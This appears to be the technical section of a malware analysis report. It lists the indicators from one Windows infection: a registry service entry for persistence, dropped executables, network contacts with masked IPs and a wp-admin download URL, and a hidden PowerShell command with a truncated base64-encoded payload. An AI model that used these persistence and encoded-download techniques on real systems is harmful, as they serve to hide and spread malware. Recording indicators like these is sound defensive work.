Technical information
- [<HKLM>\System\CurrentControlSet\Services\shimeng] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\shimeng] 'ImagePath' = '"%WINDIR%\SysWOW64\mfcm120u\shimeng.exe"'
- 'shimeng' "%WINDIR%\SysWOW64\mfcm120u\shimeng.exe"
- 'shimeng' %WINDIR%\SysWOW64\mfcm120u\shimeng.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMARQB0AC0ASQB0AEUAbQAgAHYAQQBSAEkAYQBCAEwAZQA6AFQAcwB2ADMATQBlACAAIAAoACAAIABbAHQAeQBQAGUAXQAoACcAcwB5AHMAVABlAE0ALgBpACcAKwAnAE8AJwArACcALgAnACsAJwBEACcAKwAnAGkAcg...
- %HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe
- %WINDIR%\syswow64\mfcm120u\shimeng.exe
- %HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe to %WINDIR%\syswow64\mfcm120u\shimeng.exe
- '17#.#8.199.157':80
- '59.##8.253.194':8080
- http://in#####relectronica.com/wp-admin/M/
- http://59.###.253.194:8080/QBu1K0CA0DI4S/EABA9fIyxaTvhiExglB/ via 59.##8.253.194
- DNS ASK in#####relectronica.com
- '%HOMEPATH%\lahflk6\rej2lxc\iwdm7t.exe'
- '%WINDIR%\syswow64\mfcm120u\shimeng.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMARQB0AC0ASQB0AEUAbQAgAHYAQQBSAEkAYQBCAEwAZQA6AFQAcwB2ADMATQBlACAAIAAoACAAIABbAHQAeQBQAGUAXQAoACcAcwB5AHMAVABlAE0ALgBpACcAKwAnAE8AJwArACcALgAnACsAJwBEACcAKwAnAGkAcg...' (with hidden window)